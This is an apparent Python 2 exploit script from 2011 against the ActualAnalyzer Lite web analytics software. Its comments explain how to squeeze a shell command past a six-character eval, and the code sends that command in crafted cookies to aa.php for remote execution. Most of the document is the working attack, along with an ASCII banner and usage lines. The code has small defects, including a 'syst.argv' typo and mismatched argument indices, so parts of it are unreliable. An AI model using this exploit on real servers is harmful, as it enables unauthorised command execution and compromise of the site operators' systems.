############################### # ActualAnalyzerexploit. # Tested on Lite version # We load command into a dummy variable as we only have 6 characters to own the eval # but load more as first 2 characters get rm'd. # We then execute the eval with backticks. # 11/05/2011 ############################## import urllib import urllib2 import sys import time def banner(): print " __________ " print " / __/_______ _ ____ ______/ /_________ _/ /___ _________ _/ /_______________" print " / /_/ / / / __ <code>// __ </code>/ ___/ __/ / / / __ <code>/ / __ </code>/ __ \/ __ <code>/ / / / /_/ / _ \/ ___/" print " / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/__/ /" print " /_/\__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/ " print " /_//____/ " def usage(): print " [+] Usage:" print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\"" print " [-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\"" banner() if len(sys.argv) < 6: usage() quit() domain = sys.argv[2] command = sys.argv[6] host = syst.argv[4] def commandexploit(domain,host,command): url = 'http://' + domain + '/aa.php?anp=' + host data = None headers = {'Cookie': "ant=" + command + "; anm=414.</code>$cot`"} exploit1 = urllib2.Request(url,data,headers) exploit2 = urllib2.urlopen(exploit1) commandexploit(domain,host,command) |